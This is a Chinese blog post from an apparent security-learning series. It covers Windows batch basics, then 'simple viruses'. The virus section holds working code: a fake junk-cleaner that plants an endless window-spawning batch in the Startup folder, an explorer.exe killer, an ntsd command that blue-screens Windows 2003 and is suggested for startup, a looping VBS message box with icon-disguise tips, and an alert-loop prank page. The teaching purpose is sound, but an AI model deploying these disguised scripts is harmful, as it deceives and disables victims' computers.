<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/sharingan.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/sharingan.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="批处理作用：自上而下成批处理每一条DOS命令，直到执行到最后一条。                      如何创建批处理：        扩展名：.bat 创建方法：创建一个记事本文件，然后将其扩展改为.bat 运行环境：cmd  (cmd.exe)">
<meta property="og:type" content="article">
<meta property="og:title" content="day03 - 批处理与病毒">
<meta property="og:url" content="https://yuchen-zeta.github.io/2020/08/03/day03-bat&virus/index.html">
<meta property="og:site_name" content="Yuchen&#39;s Blog">
<meta property="og:description" content="批处理作用：自上而下成批处理每一条DOS命令，直到执行到最后一条。                      如何创建批处理：        扩展名：.bat 创建方法：创建一个记事本文件，然后将其扩展改为.bat 运行环境：cmd  (cmd.exe)">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(1).png">
<meta property="og:image" content="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(2).png">
<meta property="og:image" content="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(3).png">
<meta property="og:image" content="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(4).png">
<meta property="article:published_time" content="2020-08-02T16:00:00.000Z">
<meta property="article:modified_time" content="2020-08-02T16:00:00.000Z">
<meta property="article:author" content="Yuchen">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(1).png"><title>day03 - 批处理与病毒 | Yuchen's Blog</title><link ref="canonical" href="https://yuchen-zeta.github.io/2020/08/03/day03-bat&amp;virus/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"ocean","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="javascript:;" onclick="return false;"><span class="header-nav-menu-item__icon"><i class="fas fa-feather-alt"></i></span><span class="header-nav-menu-item__text">文章</span></a><div class="header-nav-submenu"><div class="header-nav-submenu-item"><a class="header-nav-submenu-item__link" href="/archives/"><span class="header-nav-submenu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-submenu-item__text">归档</span></a></div><div class="header-nav-submenu-item"><a class="header-nav-submenu-item__link" href="/categories/"><span class="header-nav-submenu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-submenu-item__text">分类</span></a></div><div class="header-nav-submenu-item"><a class="header-nav-submenu-item__link" href="/tags/"><span class="header-nav-submenu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-submenu-item__text">标签</span></a></div></div></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Yuchen's Blog</div><div class="header-banner-info__subtitle">拉过勾的事情，就一定要做到啊！</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">day03 - 批处理与病毒</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2020-08-03</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2020-08-03</span></span><span class="post-meta-item post-meta-item--wordcount"><span class="post-meta-item__icon"><i class="far fa-file-word"></i></span><span class="post-meta-item__info">字数统计</span><span class="post-meta-item__value">1.5k</span></span></div></header><div class="post-body"><ul>
<li>批处理作用：自上而下成批处理每一条DOS命令，直到执行到最后一条。</li>
</ul>

        <h1 id="如何创建批处理：">
          <a href="#如何创建批处理：" class="heading-link"><i class="fas fa-link"></i></a><a href="#如何创建批处理：" class="headerlink" title="如何创建批处理："></a>如何创建批处理：</h1>
      <ul>
<li>扩展名：.bat</li>
<li>创建方法：创建一个记事本文件，然后将其扩展改为.bat</li>
<li>运行环境：cmd  (cmd.exe)</li>
</ul>
<span id="more"></span>


        <h1 id="基本命令">
          <a href="#基本命令" class="heading-link"><i class="fas fa-link"></i></a><a href="#基本命令" class="headerlink" title="基本命令"></a><strong>基本命令</strong></h1>
      <ul>
<li><p>echo：输出信息</p>
<blockquote>
<p>@echo off：关闭回显（屏蔽执行过程）只显示结果<br>   echo.       ：输出空行</p>
</blockquote>
</li>
</ul>
<hr>
<ul>
<li>pause：暂停批处理运行</li>
<li>cls     ：清屏</li>
</ul>
<hr>
<ul>
<li>color &lt;颜色代码&gt; ：<br>改dos界面颜色，背景色+文字颜色，如0a</li>
</ul>
<hr>
<p><img src="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(1).png"></p>
<ul>
<li>title &lt;标题内容&gt;                 ：给批处理脚本设置标题</li>
</ul>
<hr>
<ul>
<li><blockquote>
<p>nul(：隐藏结果) 2&gt; nul  (：隐藏错误信息)</p>
</blockquote>
</li>
</ul>
<hr>
<ul>
<li>md 路径+文件名                ：建立目录</li>
</ul>
<hr>
<ul>
<li>rd  (参数) 文件路径             ：删除目录<br>#参数 /s 除目录本身外还删除其下的所有子目录和文件参数<br>/q 安静模式，带 /s 删除目录树时不要求确认</li>
</ul>
<hr>
<ul>
<li>cd 路径                                ：进入目录
        <h1 id="cd-回到根目录-cd-回到上级目录">
          <a href="#cd-回到根目录-cd-回到上级目录" class="heading-link"><i class="fas fa-link"></i></a><a href="#cd-回到根目录-cd-回到上级目录" class="headerlink" title="cd\ 回到根目录   |    cd.. 回到上级目录"></a>cd\ 回到根目录   |    cd.. 回到上级目录</h1>
      </li>
</ul>
<hr>
<ul>
<li>goto &lt;区块名&gt;：跳转到一个命令区块继续运行<br>#用 :&lt;区块名&gt; 来声明一个区块例如： :7749 就声明了一个名为 7749 的区块</li>
</ul>
<hr>
<ul>
<li><p>set (可选参数) &lt;变量名&gt; = 变量值<br>#参数 /p , 程序暂停等待用户输入，变量的值就等于用户输入<br>例如：set /p a = 请输入变量 a 的值：，不加 /p 的话就是直接赋值</p>
</li>
<li><p>%&lt;变量名&gt;% ,如%u%          #引用变量，提取变量的值</p>
</li>
<li><p>典例</p>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">@echo off         </span><br><span class="line">color 0a             </span><br><span class="line">title 批处理小程序v1<span class="number">.0</span>     </span><br><span class="line"> </span><br><span class="line">:menu</span><br><span class="line">cls</span><br><span class="line">echo ==========================</span><br><span class="line">echo               菜单</span><br><span class="line">echo         <span class="number">1</span>、修改管理员密码</span><br><span class="line">echo         <span class="number">2</span>、定时关机</span><br><span class="line">echo         <span class="number">3</span>、查看本机IP</span><br><span class="line">echo         <span class="number">4</span>、退出本程序</span><br><span class="line">echo ===========================</span><br><span class="line"> </span><br><span class="line">set /p num=请输入选项：   </span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;%num%&quot;</span>==<span class="string">&quot;1&quot;</span> goto <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;%num%&quot;</span>==<span class="string">&quot;2&quot;</span> goto <span class="number">2</span></span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;%num%&quot;</span>==<span class="string">&quot;3&quot;</span> goto <span class="number">3</span></span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;%num%&quot;</span>==<span class="string">&quot;4&quot;</span> goto <span class="number">4</span></span><br><span class="line">echo 请正确输入数值，按任意键继续！</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line"> </span><br><span class="line">:<span class="number">1</span></span><br><span class="line">set /p u=请输入用户名:</span><br><span class="line">set /p p=请输入新密码:</span><br><span class="line">net user %u% %p%   &gt;nul  </span><br><span class="line">echo 您的密码已经设置成功!按任意键返回菜单!</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line">#注解：net user 用户名 密码 #修改账户密码（windows所有平台支持）</span><br><span class="line">       &gt;nul     #清除系统反馈，如命令成功完成...</span><br><span class="line">:<span class="number">2</span></span><br><span class="line">set /p time=请输入时间：</span><br><span class="line">shutdown -s -t %time%  </span><br><span class="line">set /p x=是否取消（Y：是，N：否）：</span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;%x%&quot;</span>==<span class="string">&quot;Y&quot;</span> shutdown -a</span><br><span class="line">echo 执行完毕，按任意键返回菜单!</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:<span class="number">3</span></span><br><span class="line">ipconfig</span><br><span class="line">echo 按任意键返回菜单!</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:<span class="number">4</span></span><br><span class="line">exit</span><br></pre></td></tr></table></div></figure></li>
</ul>
<hr>

        <h2 id="简单病毒">
          <a href="#简单病毒" class="heading-link"><i class="fas fa-link"></i></a><a href="#简单病毒" class="headerlink" title="简单病毒"></a>简单病毒</h2>
      <ul>
<li><p>批处理文件一</p>
<p>  功能：伪装垃圾清理程序，添加到开机自启，无限弹出cmd窗口</p>
<p>  <img src="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(2).png"></p>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">title 系统垃圾清理</span><br><span class="line">color 2f</span><br><span class="line">echo =======若杀毒软件恶意拦截，请选择【允许程序的所有操作】========</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line"><span class="attr">echo</span> :a&gt;c:\windows\zuosi.bat</span><br><span class="line">echo start&gt;&gt;c:\windows\zuosi.bat</span><br><span class="line">echo goto a&gt;&gt;c:\windows\zuosi.bat</span><br><span class="line">copy c:\windows\zuosi.bat <span class="string">&quot;%USERPROFILE%\「开始」菜单\程序\启动&quot;</span> &gt;nul</span><br><span class="line">#此处的系统启动菜单为win <span class="number">2003</span>下的，不同系统有所不同</span><br><span class="line">echo.</span><br><span class="line">echo   ====== 垃圾清理中，请不要关闭窗口======</span><br><span class="line">echo.</span><br><span class="line">ping -n <span class="number">5</span> <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> &gt;nul  #运行几秒，骗过用户</span><br><span class="line">echo.</span><br><span class="line">echo   ====== 垃圾清理完毕，共清理垃圾500M===</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo   ====== 建议立即重启电脑</span><br><span class="line">echo   按任意键关闭！</span><br><span class="line">pause</span><br><span class="line">exit</span><br></pre></td></tr></table></div></figure></li>
</ul>
<hr>
<ul>
<li><p>批处理文件二（纯恶搞）</p>
<p>  功能：伪装垃圾清理程序 强制终止桌面进程</p>
<ul>
<li>taskkill /im explorer.exe /f &gt;nul 2&gt;nul</li>
<li>taskkill：杀死进程   |   /im 进程名：指定杀死哪个进程    |   /f ：强制</li>
</ul>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">title 系统垃圾清理</span><br><span class="line">color 2f</span><br><span class="line">echo ====== 若有杀毒软件恶意拦截，请选择【允许程序的所有操作】=====</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line">echo ====== 垃圾清理中，请不要关闭窗口=======</span><br><span class="line">echo.</span><br><span class="line">ping -n <span class="number">5</span> <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> &gt;nul</span><br><span class="line">taskkill /im explorer.exe /f &gt;nul <span class="number">2</span>&gt;nul</span><br><span class="line">echo.</span><br><span class="line">echo. ===== 完了，你系统废了======</span><br><span class="line">ping -n <span class="number">5</span> <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>&gt;nul</span><br><span class="line">echo.</span><br><span class="line">start c:\windows\explorer.exe           #打开进程</span><br><span class="line">echo.</span><br><span class="line">echo ====== 已经修复好了！是不是吓坏了！！嘿嘿=========</span><br><span class="line">pause</span><br></pre></td></tr></table></div></figure></li>
</ul>
<hr>
<ul>
<li><p>简易蓝屏炸弹 - 针对win 2003</p>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntsd -c q -pn winlogon.exe</span><br></pre></td></tr></table></div></figure>

<ul>
<li>ntsd      ：杀死进程<br>ntsd -c q -pn 进程名：强制杀死指定进程</li>
<li>蓝屏原因：<pre><code> winlogon.exe为windows登录进程，在开机后就已经登录成功且处于使用状态，无法杀死，而命令想强制杀死，系统不让，结果导致蓝屏
</code></pre>
</li>
<li>作死使用方法：将该命令写成一个批处理放到系统启动文件夹下<br>结果    😈       ：开机就蓝屏</li>
</ul>
</li>
</ul>
<hr>
<ul>
<li><p>简易小脚本</p>
<ul>
<li>方法：写命令到txt，将扩展名改为.vbs</li>
</ul>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">do</span></span><br><span class="line">msgbox <span class="string">&quot;啦啦啦！&quot;</span></span><br><span class="line">loop</span><br></pre></td></tr></table></div></figure>

<ul>
<li>效果       ：加上do-loop后变为死循环，窗口无法关闭<br>解决方法：vbs 使用微软自带的wscript.exe来编写的</li>
<li>注：可以用修改软件图标，使vbs文件伪装得更好</li>
</ul>
<p>  <img src="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(3).png"></p>
<ul>
<li><p>升级小脚本（并没有什么用😒）</p>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">do</span></span><br><span class="line">msgbox <span class="string">&quot;小哥我最帅！&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;小子，你对这件事有异议吗&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;你要为此付出代价&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;从现在开始我要求你点100下鼠标&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;100&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;99&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;98&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;97&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;96&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;95&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;94&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;93&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;92&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;91&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;90&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;....&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;3&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;2&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;1&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;如果你看到这里，说明你确实很执着，你感动了我，请再点一下&quot;</span></span><br><span class="line">msgbox <span class="string">&quot;年轻人，有时候执着也没用，换个姿势再来一次&quot;</span></span><br><span class="line">loop</span><br></pre></td></tr></table></div></figure></li>
</ul>
</li>
</ul>
<hr>
<ul>
<li><p>整人网页</p>
  <figure class="highlight jsx"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">	&lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;</span><br><span class="line">	&lt;title&gt;很恶心的常见整人效果的代码&lt;/title&gt;</span><br><span class="line">	&lt;link rel=&quot;stylesheet&quot; href=&quot;&quot;&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;a href=&quot;&quot; onmouseover=&quot;alert(&#x27;飞哥真帅&#x27;);</span><br><span class="line">alert(&#x27;飞哥真帅&#x27;);</span><br><span class="line">alert(&#x27;飞哥是真帅&#x27;);</span><br><span class="line">alert(&#x27;飞哥是真帅&#x27;);</span><br><span class="line">alert(&#x27;飞哥是真的帅&#x27;);</span><br><span class="line">alert(&#x27;同意不！&#x27;);</span><br><span class="line">alert(&#x27;不同意？&#x27;);</span><br><span class="line">alert(&#x27;去死吧&#x27;);</span><br><span class="line">	&quot;&gt;不许把鼠标移到这里！&lt;/a&gt;不敢了吧！！！</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></div></figure>

<p>  测试效果：</p>
<p>  <img src="https://raw.githubusercontent.com/yuchen-zeta/images/main/blog/pic_bed/202008day03-1(4).png"></p>
</li>
</ul>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://yuchen-zeta.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2020/08/04/day04-NTFS/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">day04 - NTFS安全权限</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2020/08/03/day03-Crack-system-password/"><span class="paginator-prev__text">day03 - 破解系统密码</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA%E6%89%B9%E5%A4%84%E7%90%86%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">
          如何创建批处理：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4"><span class="toc-number">2.</span> <span class="toc-text">
          基本命令</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#cd-%E5%9B%9E%E5%88%B0%E6%A0%B9%E7%9B%AE%E5%BD%95-cd-%E5%9B%9E%E5%88%B0%E4%B8%8A%E7%BA%A7%E7%9B%AE%E5%BD%95"><span class="toc-number">3.</span> <span class="toc-text">
          cd\ 回到根目录   |    cd.. 回到上级目录</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E7%97%85%E6%AF%92"><span class="toc-number">3.1.</span> <span class="toc-text">
          简单病毒</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/blog-logo.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">Laugh Tale</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/yuchen-zeta/" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="2058149863" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Yuchen</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-space-shuttle"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/ribbon.js@latest/dist/ribbon.min.js" size="120" alpha="0.6" zIndex="-1"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
